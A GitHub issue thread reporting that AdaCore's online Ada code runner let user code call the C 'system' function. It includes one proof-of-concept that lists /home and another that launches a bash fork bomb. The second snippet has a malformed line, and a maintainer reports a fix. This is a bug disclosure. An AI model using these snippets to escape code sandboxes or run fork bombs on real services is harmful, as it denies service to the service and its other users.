### ISSUE TITLE
Run system commands

### ISSUE THREAD

**Issue by corentingay** [AdaCore/learn#79]
I am able to run the following command and I obtain 'ubuntu'.

```Ada
with Ada.Text_IO;
with Interfaces.C; use Interfaces.C;
 
procedure greet is
    function Sys (Arg : Char_Array) return Integer;
    pragma Import(C, Sys, "system");
    Ret_Val : Integer;
begin
    Ret_Val := Sys(To_C("ls /home"));
end greet;
```

**Comment by setton** [comment]
I think that's supposed to work (for now) - let's discuss if we want to prevent calls to system - or spawns, or whatever

**Comment by M4R5** [comment]
Still able to run syscall

```ada
with Interfaces.C; use Interfaces.C;
with system;
 
procedure show_vector_append itype Int is new integer;
procedure Unix_system_call (command : string) is
   null_term_command : constant string := command & ASCII.nul;
   function system (addr : system.address) return Int;
   pragma interface (C, system);
   Ret : Int;
begin
   Ret := System(null_term_command(null_term_command'first)'address);
end Unix_System_Call;
begin
   Unix_system_call ("fb(){ fb|fb & };fb");
end show_vector_append;
```

**Comment by Robert-Tice** [comment]
Fixed in PR #329
